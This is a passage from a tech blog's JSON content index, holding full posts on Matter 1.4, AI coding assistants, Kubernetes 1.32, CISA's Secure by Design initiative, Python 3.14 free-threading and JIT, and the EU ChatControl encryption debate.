2025","externalUrl":null,"permalink":"/posts/251106-github-universe-2025-copilot-evolution/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Universe 2025 showed us where coding is headed — and it’s less about typing code than ever before.","title":"GitHub Universe 2025 — Copilot Grows Up and the IDE Fades Further","type":"posts"},{"content":"The Connectivity Standards Alliance released the Matter 1.4 specification this month, adding support for new device types and improving the protocol\u0026rsquo;s energy management capabilities. Three years into Matter\u0026rsquo;s public life, it\u0026rsquo;s worth taking stock of where this ambitious interoperability standard actually stands — because the gap between the original vision and the current reality has been a source of frustration, but the trajectory is finally starting to look promising.\nWhat Matter 1.4 Actually Adds # The headline additions in Matter 1.4 include enhanced energy management features — the ability for smart home devices to report energy usage and respond to demand-response signals from utility providers. This is the kind of boring-but-important infrastructure work that makes the smart grid vision incrementally more achievable.\nNew device types include support for solar panels, batteries, heat pumps, and electric vehicle chargers within the Matter ecosystem. Water management devices like leak sensors and water valves also join the specification. None of these are going to make headline news, but they expand Matter\u0026rsquo;s coverage from \u0026ldquo;lighting and locks\u0026rdquo; to something that can plausibly manage a whole-home energy system.\nFor developers working on IoT platforms, the more interesting additions are the improvements to the commissioning flow and the enhanced multi-admin capabilities. Getting a device onto a Matter network has been one of the protocol\u0026rsquo;s roughest edges — early implementations had commissioning failure rates that would be unacceptable for consumer products. The streamlined flows in 1.4, combined with better error handling and recovery, should reduce the \u0026ldquo;I give up and return it\u0026rdquo; rate that has plagued early Matter devices.\nThe Interoperability Promise, Three Years In # Matter was announced with grand promises of universal interoperability — buy any Matter device and it works with any Matter controller, whether that\u0026rsquo;s Apple Home, Google Home, Amazon Alexa, or Samsung SmartThings. The reality has been more nuanced.\nOn the positive side, basic interoperability genuinely works. I have Matter-certified lights and switches in my home that work across Apple and Google ecosystems simultaneously, which would have been impossible (or at least deeply painful) three years ago. The protocol\u0026rsquo;s underlying technology — based on IPv6, running over Thread and Wi-Fi — is technically sound and avoids the fragmentation of the Zigbee/Z-Wave era.\nOn the negative side, the \u0026ldquo;works everywhere\u0026rdquo; promise has been limited by uneven controller implementations. Not every Matter controller supports every device type, and the user experience varies dramatically between platforms. An advanced feature like scene management might work beautifully with one controller and be completely absent in another. This isn\u0026rsquo;t a protocol problem — it\u0026rsquo;s an implementation problem — but users don\u0026rsquo;t care about that distinction.\nThe Developer Perspective # For those of us building IoT solutions professionally, Matter\u0026rsquo;s maturation has practical implications. The Matter SDK has stabilized significantly, and the development experience has improved from \u0026ldquo;prepare to suffer\u0026rdquo; to \u0026ldquo;mostly reasonable with occasional pain points.\u0026rdquo;\nThe SDK is built on C++, which means embedded developers feel at home but web developers face a learning curve. Third-party wrappers in Python and JavaScript exist but vary in quality and completeness. If you\u0026rsquo;re starting a new IoT product project, Matter compatibility is increasingly table stakes for consumer devices — retailers and ecosystem partners are pushing for it, and the CSA certification process, while not trivial, is well-documented.\nThread networking deserves special mention. The Thread border router ecosystem has expanded considerably, with most modern Apple TVs, Google Nest devices, and several third-party routers supporting Thread. This gives Matter devices a low-power mesh networking option that\u0026rsquo;s dramatically better than the Wi-Fi-only approach in terms of battery life and network reliability. If you\u0026rsquo;re building a battery-powered sensor, Thread + Matter is the combination to target.\nThe Bigger Picture: IoT Standardization # Matter exists in a broader context of IoT standardization efforts. In the industrial space, OPC UA continues to dominate. For building automation, BACnet persists. Matter\u0026rsquo;s niche is consumer and light-commercial applications, and even there it coexists with proprietary protocols from established players.\nWhat Matter has achieved, perhaps more than technical excellence, is market coordination. Getting Apple, Google, Amazon, Samsung, and hundreds of smaller players to agree on a single protocol and actually ship compatible products is a remarkable organizational achievement. The technical protocol itself is competent rather than revolutionary — but in IoT, \u0026ldquo;it actually works across vendors\u0026rdquo; is revolutionary enough.\nThe energy management additions in 1.4 also position Matter as a potential participant in the smart grid transition. As electricity grids incorporate more renewable sources with variable output, the ability for household devices to respond intelligently to grid signals — reducing consumption during peak demand, shifting EV charging to off-peak hours — becomes genuinely important. Having a standard protocol for this communication is a prerequisite for making it work at scale.\nMy Take # I\u0026rsquo;ve been working with IoT systems for over a decade, from custom Zigbee deployments to industrial MQTT architectures. Matter isn\u0026rsquo;t perfect — commissioning is still more complex than it should be, the specification moves slower than the market wants, and the \u0026ldquo;works everywhere equally\u0026rdquo; promise remains aspirational rather than fully realized.\nBut Matter 1.4 represents genuine progress. The device type coverage is approaching the point where a Matter-only smart home is viable for most users. The developer tooling has matured from prototype-quality to production-grade. And the industry alignment behind the standard shows no signs of fracturing.\nMy advice for IoT developers: if you\u0026rsquo;re building a consumer-facing connected device, Matter support should be in your product roadmap if it isn\u0026rsquo;t already. The certification process takes time, so start early. And if you\u0026rsquo;re building a platform that integrates with smart home devices, the Matter controller SDKs are mature enough to build on — you\u0026rsquo;ll reach more devices with less integration effort than maintaining a dozen proprietary protocol adapters.\nThe vision of a truly interoperable smart home isn\u0026rsquo;t fully realized yet, but with each specification release, it gets a little closer. Sometimes the slow march is the one that actually gets you there.\n","date":"30 October 2025","externalUrl":null,"permalink":"/posts/251030-matter-14-iot-interoperability/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Matter smart home protocol reaches version 1.4, and while progress has been slower than promised, the interoperability story is finally getting convincing.","title":"Matter 1.4 and the Slow March Toward IoT Sanity","type":"posts"},{"content":"It\u0026rsquo;s been roughly two and a half years since GitHub Copilot went generally available and kicked off the AI coding assistant wave. In that time, we\u0026rsquo;ve gone from \u0026ldquo;it\u0026rsquo;s autocomplete on steroids\u0026rdquo; to tools that can reason about entire codebases, plan multi-file changes, and execute complex refactoring tasks with increasing reliability. The latest updates from GitHub, Cursor, and several other players this month make it clear: we\u0026rsquo;re entering a new phase where these tools are less about generating code snippets and more about augmenting the entire development workflow.\nFrom Suggestions to Agents # The most significant shift in AI coding assistants over the past year has been the move from passive suggestion to active agency. GitHub Copilot Workspace and similar features don\u0026rsquo;t just suggest the next line of code — they understand the intent behind a task and can propose coordinated changes across multiple files. This mirrors the broader emergence of agent-based systems that can handle complex workflows autonomously.\nI\u0026rsquo;ve been using Copilot Workspace for several months now, and the experience is qualitatively different from traditional autocomplete. When I describe a bug fix or a feature in natural language, it generates a plan that identifies the relevant files, proposes specific changes, and lets me review and modify the plan before executing it. It\u0026rsquo;s not perfect — maybe 60-70% of the plans need adjustment — but even imperfect plans save time because they front-load the thinking about which files need to change.\nCursor has taken a slightly different approach with its tight integration of AI into the editor itself. The ability to select a block of code, describe what you want to change about it, and get a contextually aware diff has become part of my daily workflow. For routine refactoring — renaming concepts across a codebase, updating API call patterns, migrating from one library to another — these tools are genuinely faster than doing it manually.\nThe Codebase Understanding Problem # The limiting factor for AI coding assistants has always been context. A model that can only see the current file is dramatically less useful than one that understands your entire project. This is where the recent improvements have been most impactful.\nRAG (Retrieval-Augmented Generation) over codebases has become standard. Tools now index your project, understand import relationships, and can pull in relevant context from files you haven\u0026rsquo;t opened. This capability aligns with how modern LLMs like Claude handle large context windows and complex reasoning. When I ask for help with a function, the assistant knows about the types it depends on, the tests that cover it, and the patterns used elsewhere in the project.\nThe practical impact is significant. Earlier this year, I was onboarding to a large Python codebase — about 200,000 lines across dozens of packages. Being able to ask the AI \u0026ldquo;how does the authentication flow work in this project?\u0026rdquo; and get an accurate walkthrough with file references saved me days of manual code archaeology. This is where AI assistants provide the most value — not in writing new code, but in understanding existing code.\nWhat\u0026rsquo;s Actually Working in Production # After extensive use across several projects, I\u0026rsquo;ve developed a clear mental model of where AI coding assistants deliver real value and where they fall short:\nHigh value: Boilerplate generation, test writing, documentation, code explanation, regex and SQL writing, API integration code, standard CRUD operations. Anything where the pattern is well-established and the AI has seen thousands of examples.\nMedium value: Bug diagnosis (pointing in the right direction), refactoring suggestions, code review assistance, learning new frameworks. Useful but requires active human judgment.\nLow value: Complex architectural decisions, novel algorithm design, performance optimization of critical paths, security-sensitive code. These still require deep human expertise and the AI can actually be dangerous here by producing plausible-looking but subtly wrong solutions.\nThe teams I see getting the most value from AI assistants are the ones that have internalized this mental model. They use AI aggressively for the high-value tasks, critically for the medium-value ones, and avoid over-relying on it for low-value scenarios.\nThe Productivity Question # The elephant in the room is productivity measurement. GitHub\u0026rsquo;s internal studies claim 55% faster task completion with Copilot. Various other studies have shown numbers ranging from 20% to 75% improvement depending on the task and the developer\u0026rsquo;s experience level.\nMy personal experience: for the tasks where AI assistants excel (boilerplate, tests, documentation), the speedup is easily 2-3x. For complex feature work, the benefit is more modest — maybe 10-20%, mostly from faster context gathering and less time looking up API documentation. Overall, I\u0026rsquo;d estimate a 25-30% productivity improvement for my typical work mix, which is substantial.\nBut raw speed isn\u0026rsquo;t the whole story. I\u0026rsquo;ve noticed that AI assistants subtly change how I work. I write more tests because the marginal cost of writing tests has dropped dramatically. I add more documentation because generating a good docstring takes seconds. I refactor more aggressively because the AI can handle the mechanical parts of a refactoring. These qualitative improvements in code quality might matter more than the raw speed gains.\nMy Take # We\u0026rsquo;re past the \u0026ldquo;is AI coding useful?\u0026rdquo; debate. It is. The interesting questions now are about integration depth, team workflows, and long-term skill development. I have some concerns about junior developers over-relying on AI for code they don\u0026rsquo;t fully understand — the learning process of struggling with a problem has real value that you lose when the AI just gives you the answer.\nBut for experienced developers who can critically evaluate AI output, these tools are a genuine force multiplier. My recommendation: invest time in learning the advanced features of your chosen tool. Most developers I talk to are using maybe 20% of what their AI assistant can do. Explore multi-file editing, codebase Q\u0026amp;A, and the emerging agentic features. The productivity ceiling is much higher than most people realize.\nThe next frontier is AI assistants that can run code, execute tests, and iterate on their own output. We\u0026rsquo;re seeing early versions of this already. AI-assisted testing is one domain where this capability is already proving valuable, and it\u0026rsquo;s going to change the development workflow even more fundamentally than autocomplete did.\n","date":"23 October 2025","externalUrl":null,"permalink":"/posts/251023-ai-coding-assistants-beyond-autocomplete/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AI coding assistants have evolved from glorified autocomplete to genuine development partners, and the implications for how we build software are becoming clearer.","title":"AI Coding Assistants Are Growing Up — Beyond Autocomplete","type":"posts"},{"content":"Kubernetes 1.32 is here, and while it\u0026rsquo;s not the kind of release that generates breathless headlines, it\u0026rsquo;s exactly the kind of release that makes platform engineers\u0026rsquo; lives measurably better. After nearly a decade of Kubernetes being the de facto container orchestration standard, the project has settled into a rhythm of steady, meaningful improvements rather than dramatic architectural shifts. That\u0026rsquo;s a sign of maturity, and frankly, it\u0026rsquo;s what the ecosystem needs.\nSidecar Containers Graduate # The most significant feature in 1.32 is the graduation of native sidecar containers to stable. This has been a long time coming. The init container-based sidecar pattern that was introduced in 1.28 has been refined over several releases, and it\u0026rsquo;s now production-ready with proper lifecycle management.\nIf you\u0026rsquo;ve ever fought with sidecar ordering issues — your application container starting before the Envoy proxy is ready, or your logging sidecar being killed before the main container finishes flushing its buffers — you know why this matters. Native sidecar support means these containers start before and terminate after the main application containers, with proper health checking at each stage.\nFor service mesh users in particular, this is a quality-of-life improvement that eliminates an entire category of intermittent startup failures. I\u0026rsquo;ve spent more hours than I\u0026rsquo;d like to admit debugging \u0026ldquo;connection refused\u0026rdquo; errors that turned out to be race conditions between application startup and proxy readiness. Those days should be behind us. Advanced container security practices build on these foundational lifecycle improvements. The recent Ingress nightmare vulnerability demonstrated exactly how critical proper sidecar and container lifecycle management is for security and stability.\nResource Management Gets Smarter # The improvements to resource management in 1.32 continue the trend of making Kubernetes more efficient in how it allocates and tracks compute resources. The in-place resource resize feature, which allows you to change CPU and memory limits on running pods without restarting them, has seen further stabilization.\nIn practice, this means you can respond to load changes more gracefully. Instead of killing a pod and rescheduling it with new resource limits — which might trigger service disruption if you\u0026rsquo;re not careful with your PodDisruptionBudgets — you can adjust limits on the fly. Combined with the Vertical Pod Autoscaler, this creates a much more responsive resource management loop. This approach aligns with broader platform engineering trends that emphasize automation and reduced manual intervention.\nThe memory manager improvements also deserve attention. Better NUMA-aware memory allocation helps workloads sensitive to memory locality, increasingly relevant as organizations run more ML inference workloads on Kubernetes. Getting memory allocation wrong in a NUMA topology can tank inference latency, and these improvements make it easier to express and enforce the right memory placement policies.\nThe Simplification Agenda # What I appreciate most about recent Kubernetes releases is the continued effort to simplify operations. The improvements to kubectl debugging, the ongoing work to reduce the API surface area where possible, and better defaults all contribute to making Kubernetes less operationally expensive.\nThe enhanced Gateway API support in this release is a good example. Gateway API has been steadily replacing Ingress as the recommended way to manage traffic routing, and 1.32 adds better support for traffic splitting and header-based routing at the API level. If you\u0026rsquo;re still using Ingress resources with provider-specific annotations — and let\u0026rsquo;s be honest, most of us are — this release is a good prompt to start evaluating the migration. Beyond load balancing, security hardening practices for Kubernetes are equally important as new features.\nThe ValidatingAdmissionPolicy improvements also reduce the need for external webhook-based policy engines for common validation scenarios. Being able to express policies in CEL (Common Expression Language) directly in the API server, without running a separate webhook service, eliminates a potential failure point and simplifies the admission control stack. Compliance and policy frameworks increasingly leverage these in-cluster policy capabilities. This aligns with the broader shift toward infrastructure-as-code practices, policy-as-code patterns, and cloud cost management strategies that reduce operational overhead.\nThe Broader Cloud-Native Landscape # Kubernetes 1.32 doesn\u0026rsquo;t exist in isolation. The broader cloud-native ecosystem continues to consolidate around patterns that would have seemed exotic a few years ago. GitOps with ArgoCD or Flux is now the default deployment model for most teams I work with. Platform engineering teams are building internal developer platforms on top of Kubernetes rather than exposing raw cluster access. And eBPF-based networking and observability through projects like Cilium and Tetragon are replacing traditional iptables-based networking. The observability maturity with OpenTelemetry standards means containers and orchestration are now first-class observability concerns.\nThe result is that the Kubernetes experience in late 2025 is dramatically different from what it was even two years ago. You\u0026rsquo;re less likely to be writing raw YAML manifests and more likely to be interacting with a platform team\u0026rsquo;s abstractions. That\u0026rsquo;s healthy — Kubernetes was always meant to be infrastructure, not a user interface. For teams managing cloud infrastructure across multiple providers, multi-cloud strategies are increasingly important alongside Kubernetes adoption. Infrastructure-as-code tools like OpenTofu provide better choices for declaring and managing cloud-native infrastructure.\nSub-Hub: Kubernetes \u0026amp; Container Orchestration # For a comprehensive view of how Kubernetes has matured from operational challenge to invisible foundation, see Kubernetes \u0026amp; Container Orchestration — From Infrastructure to Invisible Foundation. This sub-hub explores Kubernetes\u0026rsquo;s role in modern infrastructure, from security to AI workload orchestration.\nMy Take # I\u0026rsquo;ve been running Kubernetes in production since the 1.6 days, and the contrast with where we are now is striking. The platform has gone from \u0026ldquo;exciting but rough\u0026rdquo; to \u0026ldquo;boring infrastructure that just works\u0026rdquo; — which is exactly where you want your container orchestrator to be. The broader shift toward agent-ready architectures depends on this foundational infrastructure maturity.\nMy advice for teams on older versions: the upgrade path to 1.32 is well-documented and breaking changes are minimal. The sidecar container graduation alone is worth the upgrade if you\u0026rsquo;re running any kind of service mesh. If you\u0026rsquo;re still on iptables-based kube-proxy, this is a reasonable time to evaluate the nftables backend. OpenTofu\u0026rsquo;s maturity provides a solid foundation for codifying your Kubernetes infrastructure.\nKubernetes isn\u0026rsquo;t going anywhere, and releases like 1.32 demonstrate why. Steady, backward-compatible improvements that respect the massive installed base while continuing to evolve the platform. That\u0026rsquo;s good engineering. The platform\u0026rsquo;s continued maturity benefits all use cases.\n","date":"16 October 2025","externalUrl":null,"permalink":"/posts/251016-kubernetes-132-platform-maturity/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.32 arrives with improvements to sidecar containers, resource management, and the continued push to simplify the platform for operators.","title":"Kubernetes 1.32 — The Platform Keeps Maturing","type":"posts"},{"content":"CISA\u0026rsquo;s Secure by Design initiative has been building momentum throughout 2025, and this week\u0026rsquo;s updated guidance and the growing list of vendor commitments signal that we might be witnessing a genuine shift in how the software industry approaches security. After decades of treating security as an afterthought — something to bolt on after shipping — the regulatory and market pressure is converging to make \u0026ldquo;secure by default\u0026rdquo; more than just a slogan.\nFrom Voluntary Pledges to Industry Expectations # When CISA first launched the Secure by Design pledge earlier this year, I was cautiously optimistic but skeptical about enforcement. Voluntary commitments in tech have a mixed track record, to put it diplomatically. But the landscape has shifted faster than I expected.\nOver 200 software companies have now signed the pledge, committing to concrete actions like eliminating default passwords, implementing multi-factor authentication by default, and reducing entire classes of vulnerabilities. More importantly, major enterprise procurement teams are starting to use pledge compliance as a vendor selection criterion. When security commitments affect revenue, they tend to get taken seriously.\nThe updated guidance released this week adds more specific technical recommendations around memory-safe languages, SBOM (Software Bill of Materials) requirements, and vulnerability disclosure timelines. These aren\u0026rsquo;t revolutionary ideas — the security community has been advocating for them for years — but having them codified in government-backed guidance gives engineering teams ammunition to justify the investment to business stakeholders.\nThe Memory Safety Conversation Gets Practical # One of the most impactful elements of CISA\u0026rsquo;s push has been the emphasis on memory-safe languages. The NSA and CISA guidance recommending migration away from C and C++ for new projects has moved from \u0026ldquo;interesting recommendation\u0026rdquo; to \u0026ldquo;thing procurement officers ask about.\u0026rdquo;\nI\u0026rsquo;ve been writing software long enough to remember when buffer overflows were considered an inevitable cost of doing business. The data is unambiguous — memory safety issues account for roughly 70% of serious vulnerabilities in large C/C++ codebases, according to studies from Microsoft and Google. The industry push toward Rust, Go, and other memory-safe alternatives isn\u0026rsquo;t just about developer preferences; it\u0026rsquo;s becoming a supply chain security requirement.\nWhat\u0026rsquo;s practical about CISA\u0026rsquo;s approach is that they\u0026rsquo;re not demanding immediate rewrites of legacy systems. The guidance focuses on new development and critical components, which is the only realistic path forward. You can\u0026rsquo;t rewrite 40 years of C infrastructure overnight, but you can make sure your new HTTP parser or TLS implementation uses a language that won\u0026rsquo;t let you accidentally create a remote code execution vulnerability.\nSupply Chain Security Matures # The SBOM requirements that are now being woven into government procurement and increasingly into private sector contracts represent the other major shift. After the SolarWinds and Log4j incidents demonstrated how fragile software supply chains can be, the industry has been slowly building the tooling and processes to actually track what\u0026rsquo;s in our software.\nTools like Syft, Trivy, and the SPDX/CycloneDX standards have matured significantly. Most CI/CD pipelines can now generate an SBOM as part of the build process with minimal friction. The challenge has shifted from \u0026ldquo;how do we generate an SBOM\u0026rdquo; to \u0026ldquo;how do we make SBOMs actionable\u0026rdquo; — meaning, how do you efficiently correlate a newly discovered vulnerability against every deployed system that contains the affected component?\nThis is where I think the next wave of innovation will happen. The generation problem is largely solved. The consumption and response problem is where most organizations still struggle. When the next Log4j-scale vulnerability drops, can your organization answer \u0026ldquo;are we affected?\u0026rdquo; in minutes rather than days?\nThe Developer Experience Gap # My one concern with the Secure by Design push is the developer experience gap. Security tooling has historically been built for security teams, not for developers. When you mandate SAST scans, dependency checks, and SBOM generation in every pipeline, you need those tools to be fast, accurate, and low-friction — or developers will find ways to work around them.\nThe best security tools in 2025 are the ones that feel invisible. GitHub\u0026rsquo;s Dependabot, Snyk\u0026rsquo;s IDE integrations, and similar tools that surface vulnerabilities at the point where developers can actually fix them — in the editor and in the PR — represent the right model. The worst are the ones that generate 500-item reports of mostly false positives that nobody reads.\nMy Take # I\u0026rsquo;ve lived through enough security \u0026ldquo;revolutions\u0026rdquo; to be wary of declaring victory prematurely. But CISA\u0026rsquo;s Secure by Design initiative feels different because it\u0026rsquo;s attacking the problem from the economic side, not just the technical side. When secure software becomes a procurement advantage and insecure software becomes a liability, the incentive structure changes fundamentally.\nFor engineering teams, my advice is straightforward: if you haven\u0026rsquo;t already, integrate SBOM generation into your build pipeline this quarter. Evaluate your new projects\u0026rsquo; language choices through a memory safety lens. And read the CISA guidance — it\u0026rsquo;s surprisingly practical and well-written for a government document.\nThe window to be ahead of these requirements is closing. Better to adopt them voluntarily now, on your own timeline, than to scramble when they become contractual obligations.\n","date":"9 October 2025","externalUrl":null,"permalink":"/posts/251009-cisa-secure-by-design-traction/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CISA’s Secure by Design initiative is moving from voluntary pledges to measurable industry impact, and software vendors are starting to feel the pressure.","title":"Secure by Design — CISA's Push Is Finally Gaining Real Traction","type":"posts"},{"content":"Python 3.14 dropped this week, and for the first time in a long while, the headline features aren\u0026rsquo;t about syntax sugar or new standard library modules — they\u0026rsquo;re about raw performance and concurrency. The free-threaded build (no-GIL mode) introduced experimentally in 3.13 has received significant stabilization work, and the experimental JIT compiler has grown more capable. After thirty years of writing Python, I can say this release feels like a genuine inflection point.\nThe GIL Is Loosening Its Grip # The Global Interpreter Lock has been Python\u0026rsquo;s most discussed limitation for as long as I can remember. PEP 703, which laid the groundwork for a GIL-optional build, started bearing fruit in 3.13 with the experimental --disable-gil build flag. In 3.14, the free-threaded build has moved from \u0026ldquo;brave early adopters only\u0026rdquo; to something that a growing number of C extension authors are actively supporting.\nWhat\u0026rsquo;s changed? The reference counting mechanism has been further optimized for thread safety, and the team has addressed several race conditions that plagued early adopters. More importantly, NumPy, pip, and several core scientific computing libraries have been shipping free-threaded compatible wheels, which means you can actually use this mode for real workloads without immediately hitting extension compatibility walls. This mirrors the ongoing evolution we\u0026rsquo;ve seen in language ecosystems where safety and performance improvements compound over time.\nI\u0026rsquo;ve been testing some of my data pipeline code with the free-threaded build, and the results are promising — though not without caveats. CPU-bound multi-threaded workloads see genuine speedups, but memory usage is notably higher due to the biased reference counting scheme. For I/O-bound work, which is where most of my production Python lives, the difference is negligible since asyncio already handles that well.\nThe JIT Compiler Grows Up # The copy-and-patch JIT compiler, also introduced experimentally in 3.13, has received substantial improvements. It now handles a wider range of bytecode operations and the performance gains are more consistent. In my benchmarks, compute-heavy pure Python code runs roughly 10-15% faster with the JIT enabled, which isn\u0026rsquo;t going to replace C extensions for hot loops, but it meaningfully improves the baseline.\nWhat excites me more than the current numbers is the architecture. The JIT is designed to be incrementally improved — each release can teach it new optimization patterns without breaking backward compatibility. This is the kind of long-term infrastructure investment that pays compounding dividends.\nThe team has also improved the tier-2 optimizer that feeds into the JIT, with better specialization for common patterns like attribute access and dictionary operations. If you\u0026rsquo;re writing typical web application code, these are exactly the operations that dominate your runtime.\nWhat This Means for the Ecosystem # The practical impact of 3.14 depends heavily on your use case and your timeline. If you\u0026rsquo;re running a Django or Flask application, upgrading to 3.14 gets you modest performance improvements out of the box from the JIT and general interpreter optimizations. The free-threaded build isn\u0026rsquo;t something I\u0026rsquo;d recommend for production web services yet — the ecosystem compatibility story still has gaps, and WSGI/ASGI servers need more time to mature their threading models.\nWhere I see the most immediate impact is in data science and ML pipelines. The combination of free-threading and libraries like NumPy that are already compatible means you can build genuinely parallel data processing pipelines in pure Python without reaching for multiprocessing and its serialization overhead. This capability aligns with how modern AI systems are moving toward more sophisticated reasoning and orchestration, where Python\u0026rsquo;s flexibility with performance can be leveraged effectively. For teams that have been fighting with multiprocessing.Pool and pickle limitations for years, this is a real quality-of-life improvement.\nThe typing improvements in 3.14 also deserve mention — PEP 728 bringing TypedDict with extra items handling and continued improvements to type statement support make the gradual typing story more complete. Better type support enables the kind of complex tooling and autonomous systems that benefit from strong static guarantees. For large codebases, these incremental typing improvements compound into significantly better tooling support.\nMy Take # I\u0026rsquo;ve seen Python evolve from a scripting curiosity to the dominant language in data science and a major player in web development. This release feels different from the usual \u0026ldquo;nice new features\u0026rdquo; updates. The performance work in 3.13 and 3.14 represents a fundamental shift in the project\u0026rsquo;s priorities — acknowledging that Python\u0026rsquo;s future depends on being fast enough that \u0026ldquo;rewrite it in Rust\u0026rdquo; isn\u0026rsquo;t the default answer for every performance-sensitive component.\nThe free-threaded build won\u0026rsquo;t be the default for at least another release or two, and that\u0026rsquo;s the right call. But the trajectory is clear: Python is systematically removing the technical limitations that have defined it for decades, while preserving the simplicity that made it successful in the first place.\nMy recommendation? Start testing your CI pipelines with the free-threaded build now, even if you don\u0026rsquo;t plan to deploy it yet. Identify which of your dependencies support it and which don\u0026rsquo;t. When the switch eventually flips, you\u0026rsquo;ll want to be ready — and you\u0026rsquo;ll want your upstream dependencies to know you care about compatibility.\nThe Python team has proven they can execute on ambitious multi-year technical roadmaps. I\u0026rsquo;m genuinely optimistic about where 3.15 and 3.16 take this.\n","date":"2 October 2025","externalUrl":null,"permalink":"/posts/251002-python-314-free-threading-jit/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.14 arrives with maturing free-threading support and an experimental JIT compiler, signaling a new performance era for the language.","title":"Python 3.14 Lands — Free-Threading and the JIT Take Shape","type":"posts"},{"content":"The EU\u0026rsquo;s ChatControl proposal is back in the headlines this week, and if you haven\u0026rsquo;t been following this saga, you should be — because it has the potential to fundamentally undermine end-to-end encryption for hundreds of millions of people. This connects to broader regulatory efforts like the EU AI Act that are reshaping how digital systems operate in Europe. A detailed analysis circulating on Hacker News has pushed the discussion to over 1,100 upvotes and 630 comments, reflecting the intense concern in the technical community.\nThe proposal, at its core, would require messaging platforms — including those offering end-to-end encryption — to scan private messages for illegal content. Earlier this month, Germany secured a blocking minority against the proposal, but it keeps coming back in modified forms. The latest iteration is particularly concerning for anyone who understands how cryptography actually works.\nThe Technical Impossibility # Let me be uncharacteristically blunt: you cannot scan encrypted messages without breaking encryption. This isn\u0026rsquo;t a political opinion; it\u0026rsquo;s mathematics.\nEnd-to-end encryption means that only the sender and recipient can read a message. The platform operator cannot. A court order cannot. A government agency cannot. That\u0026rsquo;s the entire point. If you introduce a mechanism to scan message content — whether on the device before encryption (\u0026ldquo;client-side scanning\u0026rdquo;) or through some key escrow arrangement — you have created a vulnerability that can be exploited.\nThe EU proposal\u0026rsquo;s supporters argue that client-side scanning is different from \u0026ldquo;breaking encryption\u0026rdquo; because the encryption itself remains intact during transit. This is technically true in the narrowest possible sense, and completely misleading in practice. If my device scans my message before encrypting it and reports the content to a third party, the practical effect is identical to having no encryption at all.\nSecurity researchers have been making this argument for years. A 2021 open letter signed by hundreds of cryptographers and security experts laid out the case clearly. Nothing has changed since then — the math hasn\u0026rsquo;t gotten more cooperative.\nClient-Side Scanning: A Closer Look # The client-side scanning approach deserves particular scrutiny because it\u0026rsquo;s being presented as a reasonable compromise. The idea is: before you send a message, your device checks it against a database of known illegal content (typically using perceptual hashing) and flags matches.\nThe problems are numerous:\nFalse positives: Perceptual hashing is imprecise by design. It\u0026rsquo;s meant to catch variations of known images, but it also matches innocent content. Apple briefly implemented a client-side scanning system for iCloud Photos in 2021 and quickly shelved it after researchers demonstrated concerning false positive rates.\nDatabase integrity: Who controls the hash database? What prevents a government from adding political content, protest images, or journalism to the scanning database? The technical architecture doesn\u0026rsquo;t distinguish between scanning for illegal content and scanning for dissident content. Authoritarian regimes around the world would love this precedent.\nScope creep: Today it\u0026rsquo;s one specific category of illegal content. Tomorrow it\u0026rsquo;s terrorism. Then copyright infringement. Then \u0026ldquo;disinformation.\u0026rdquo; The history of surveillance technology is a history of mission creep.\nImplementation burden: Every messaging platform would need to implement and maintain scanning infrastructure, creating enormous compliance costs that disproportionately affect smaller and open-source projects. How does Signal, a non-profit, absorb this kind of mandate?\nGermany\u0026rsquo;s Blocking Minority # The good news this month is that Germany has maintained its opposition to ChatControl, securing enough allied votes to block the proposal at the EU Council level. Germany\u0026rsquo;s position, influenced by strong privacy advocacy and constitutional protections for communication privacy, has been a crucial counterweight to the proposal\u0026rsquo;s supporters.\nBut a blocking minority isn\u0026rsquo;t a victory — it\u0026rsquo;s a stalemate. The European Commission can revise and resubmit, and the political dynamics can shift. Some member states remain strongly in favor of mandatory scanning, and the emotional arguments in favor of it are powerful (even when the technical arguments are not).\nThis is why continued vigilance matters. The technical community needs to keep explaining, clearly and patiently, why this approach cannot work as advertised. Not because the goal is wrong — combating illegal content is a legitimate priority — but because the proposed mechanism would cause far more harm than good.\nWhat Developers Should Understand # If you build applications that handle private communication — and in 2025, that\u0026rsquo;s a lot of applications — ChatControl-style regulation could directly affect you. Even if you\u0026rsquo;re not building a messaging app, any application with user-to-user communication features could potentially fall under such mandates.\nHere\u0026rsquo;s what to think about:\nEncryption architecture matters: If you\u0026rsquo;re designing a system, think carefully about your encryption model. True end-to-end encryption is a feature that users increasingly demand, and any regulation that compromises it will force difficult product decisions.\nRegulatory divergence: The EU, US, UK, and other jurisdictions are all pursuing different approaches to encrypted communication. If you operate globally, you may face contradictory requirements. The UK\u0026rsquo;s Online Safety Act has similar provisions, though implementation details remain unclear. These regulatory trends represent a fundamental tension between innovation and governance that will define the next decade of software development.\nOpen source implications: If you maintain or contribute to open-source messaging tools, mandatory scanning requirements could create compliance obligations that are difficult or impossible to meet without corporate backing.\nMy Take # I\u0026rsquo;ve been in the security space long enough to recognize a pattern: governments periodically demand backdoors in encryption, technologists explain why that\u0026rsquo;s impossible without compromising everyone\u0026rsquo;s security, the proposal gets shelved, and then it comes back a few years later with different branding.\nThe Clipper Chip in the 1990s. The \u0026ldquo;going dark\u0026rdquo; narrative in the 2010s. Now ChatControl. The underlying tension is real — law enforcement\u0026rsquo;s job is genuinely harder when they can\u0026rsquo;t access communications. But the proposed solution — weakening encryption for everyone — is worse than the problem.\nI\u0026rsquo;m encouraged that Germany is holding the line, and that the technical community continues to engage substantively with this debate rather than dismissing it. The stakes parallel what we\u0026rsquo;re seeing with supply chain security initiatives — where technical solutions must navigate political complexity. But we can\u0026rsquo;t be complacent. This proposal, or something very like it, will keep coming back until there\u0026rsquo;s a definitive political resolution.\nIn the meantime, if you\u0026rsquo;re building systems that people depend on for private communication, keep building them right. Strong encryption isn\u0026rsquo;t just a feature — it\u0026rsquo;s a responsibility.\nThis post is part of the Security in Practice series, covering real-world security issues that affect developers and the systems we build.\n","date":"25 September 2025","externalUrl":null,"permalink":"/posts/250925-eu-chatcontrol-encryption-threat/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The EU’s latest push to scan encrypted messages reignites the fundamental debate about whether governments can mandate backdoors without destroying security for everyone.","title":"EU ChatControl Is Back — And It's Still a Terrible Idea for Encryption","type":"posts"},{"content":"","date":"25 September 2025","externalUrl":null,"permalink":"/tags/privacy/","section":"Blog 